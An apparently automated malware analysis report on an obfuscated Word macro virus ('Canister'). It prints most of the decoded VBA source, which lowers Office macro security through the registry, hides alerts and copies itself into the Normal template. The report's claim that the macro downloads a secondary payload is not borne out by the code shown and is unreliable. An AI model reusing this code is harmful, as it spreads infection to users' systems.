Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6ba02f6b18dec955…

MALICIOUS

Office (OLE)

Size: 31.5 KB
Created: 2003-08-16 15:46:00
Authoring application: Microsoft Word 10.0
First seen: 2012-06-14
MD5: 6a6f30f8532bc94f9ce24709c26dac80
SHA-1: 949fb37b65be8ec5b01db3cdd30ecb75ae6123fd
SHA-256: 6ba02f6b18dec955e25e6831d9a939403a3bb42b2c59bcd50a23faf025d14d01
Risk Score: 120

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File

The file contains VBA macros, indicated by the OLE_VBA_MACROS heuristic. The script uses `CallByName` extensively and attempts to manipulate registry keys, specifically writing to `HKCU\Software\Microsoft\Office\10.0\Word\Security\Current_user\File`. This suggests the macro is designed to download and execute a secondary payload, aligning with the ClamAV detection of 'Doc.Trojan.Canister-1'.

Heuristics (3)

  • ClamAV: Doc.Trojan.Canister-1 (severity: critical, ID: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Canister-1
  • VBA macros detected (severity: medium, ID: OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • CallByName call (severity: high, ID: OLE_VBA_CALLBYNAME)
    The VBA code invokes CallByName, which resolves property and method names at run time and is commonly used to hide which Office objects a macro touches

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4533 bytes
SHA-256: 8950fd0308382aa3fe1d11df3e161ac4196dfb82d57480f707fa00e210e0091c
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Private Sub Document_Close() 'WMXP.CaniSter by Kernel32
FQPOTCYBCLM01: Randomize Timer: Dim KBPOIAJSIJCW(20) As String: Dim MLGBQPWVWVX(10) As String: GoSub FQPOTCYBCLM25: GoTo FQPOTCYBCLM20
FQPOTCYBCLM06: VBA.CallByName Options.Application, MLGBQPWVWVX(3), VbLet, XJKMRRVTYRGUW: VBA.CallByName Options, MLGBQPWVWVX(6), VbLet, XJKMRRVTYRGUW: GoTo FQPOTCYBCLM07:
FQPOTCYBCLM09: VBA.CallByName CLAUYYGHVGDU, MLGBQPWVWVX(5), VbMethod, QCAJUDMVDGGJEV: GoTo FQPOTCYBCLM10
FQPOTCYBCLM13: KBPOIAJSIJCW(LDYPAMMQBIQB) = "VQWNCIKMOVNKI": KBPOIAJSIJCW(2) = "XJKMRRVTYRGUW": KBPOIAJSIJCW(3) = "LDYPAMMQBIQB": KBPOIAJSIJCW(13) = "MLGBQPWVWVX": GoTo FQPOTCYBCLM14
FQPOTCYBCLM21: MLGBQPWVWVX(3) = StrReverse("gnitadpUneercS"): MLGBQPWVWVX(4) = StrReverse("senileteleD"): GoTo FQPOTCYBCLM22
FQPOTCYBCLM20: MLGBQPWVWVX(1) = StrReverse("senilfotnuoC"): MLGBQPWVWVX(2) = StrReverse("seniL"): GoTo FQPOTCYBCLM21
FQPOTCYBCLM22: MLGBQPWVWVX(5) = StrReverse("gnirtsmorfddA"): MLGBQPWVWVX(6) = StrReverse("tpmorPlamroNevaS"): GoTo FQPOTCYBCLM23
FQPOTCYBCLM10: Set BUPFMXCXSNUGW = ActiveDocument.VBProject.VBComponents(LDYPAMMQBIQB).CodeModule: GoTo FQPOTCYBCLM11
FQPOTCYBCLM07: Set CLAUYYGHVGDU = NormalTemplate.VBProject.VBComponents(LDYPAMMQBIQB).CodeModule: GoTo FQPOTCYBCLM08
FQPOTCYBCLM25: CallByName System, StrReverse("gnirtseliforpetavirP"), VbLet, "", StrReverse("\ytiruceS\Drow\0.01\eceffO\tfosorciM\erawtfos\resu_tnerruc_yekh"), "Level", 1&: GoTo FQPOTCYBCLM26
FQPOTCYBCLM16: KBPOIAJSIJCW(10) = "HGSEMIQXFLIQDY": KBPOIAJSIJCW(11) = "UIVFVFDGUKHE": KBPOIAJSIJCW(12) = "AIWAMVYCGFN": GoTo FQPOTCYBCLM17
FQPOTCYBCLM24: MLGBQPWVWVX(9) = StrReverse("strelAyalpsiD"): MLGBQPWVWVX(10) = StrReverse("enilecalpeR"): GoTo FQPOTCYBCLM02
FQPOTCYBCLM04: VBA.CallByName Application, MLGBQPWVWVX(7), VbLet, XJKMRRVTYRGUW: VBA.CallByName Application, MLGBQPWVWVX(9), VbLet, wdAlertsNone: GoTo FQPOTCYBCLM05
FQPOTCYBCLM11: VBA.CallByName BUPFMXCXSNUGW, MLGBQPWVWVX(4), VbMethod, LDYPAMMQBIQB, VBA.CallByName(BUPFMXCXSNUGW, MLGBQPWVWVX(1), VbGet): GoTo FQPOTCYBCLM12
FQPOTCYBCLM19: For HGSEMIQXFLIQDY = 2 To 25 Step VBA.Int(Rnd * 3) + LDYPAMMQBIQB: UIVFVFDGUKHE = VBA.CallByName(VQWNCIKMOVNKI, MLGBQPWVWVX(2), VbGet, LDYPAMMQBIQB + HGSEMIQXFLIQDY, LDYPAMMQBIQB): AIWAMVYCGFN = VBA.CallByName(VQWNCIKMOVNKI, MLGBQPWVWVX(2), VbGet, 2 + HGSEMIQXFLIQDY, LDYPAMMQBIQB): VBA.CallByName VQWNCIKMOVNKI, MLGBQPWVWVX(10), VbMethod, HGSEMIQXFLIQDY + LDYPAMMQBIQB, AIWAMVYCGFN: VBA.CallByName VQWNCIKMOVNKI, MLGBQPWVWVX(10), VbMethod, HGSEMIQXFLIQDY + 2, UIVFVFDGUKHE: Next: End
FQPOTCYBCLM15: KBPOIAJSIJCW(7) = "KBPOIAJSIJCW": KBPOIAJSIJCW(8) = "FQPOTCYBCLM": KBPOIAJSIJCW(9) = "BRYTJTKYYSHVMU": GoTo FQPOTCYBCLM16
FQPOTCYBCLM12: VBA.CallByName BUPFMXCXSNUGW, MLGBQPWVWVX(5), VbMethod, QCAJUDMVDGGJEV: GoTo FQPOTCYBCLM19
FQPOTCYBCLM26: CallByName System, StrReverse("gnirtseliforpetavirP"), VbLet, "", StrReverse("\ytiruceS\Drow\0.01\eceffO\tfosorciM\erawtfos\resu_tnerruc_yekh"), StrReverse("MOBVsseccA"), 1&: Return
FQPOTCYBCLM05: VBA.CallByName Application.Options, MLGBQPWVWVX(8), VbLet, XJKMRRVTYRGUW: GoTo FQPOTCYBCLM06
FQPOTCYBCLM02: XJKMRRVTYRGUW = (False * False): LDYPAMMQBIQB = (True / True): Set VQWNCIKMOVNKI = VBE.ActiveVBProject.VBComponents(LDYPAMMQBIQB).CodeModule: GoTo FQPOTCYBCLM03
FQPOTCYBCLM18: QCAJUDMVDGGJEV = Replace(QCAJUDMVDGGJEV, KBPOIAJSIJCW(Int(Rnd * 13) + LDYPAMMQBIQB), BRYTJTKYYSHVMU): Return
FQPOTCYBCLM23: MLGBQPWVWVX(7) = StrReverse("raBsutatsyalpsiD"): MLGBQPWVWVX(8) = StrReverse("snoisrevnoCmrifnoC"): GoTo FQPOTCYBCLM24
FQPOTCYBCLM03: QCAJUDMVDGGJEV = VBA.CallByName(VQWNCIKMOVNKI, MLGBQPWVWVX(2), VbGet, LDYPAMMQBIQB, VBA.CallByName(VQWNCIKMOVNKI, MLGBQPWVWVX(1), VbGet)): GoSub FQPOTCYBCLM13: GoTo FQPOTCYBCLM04
FQPOTCYBCLM14: KBPOIAJSIJCW(4) = "QCAJUDMVD
... (truncated)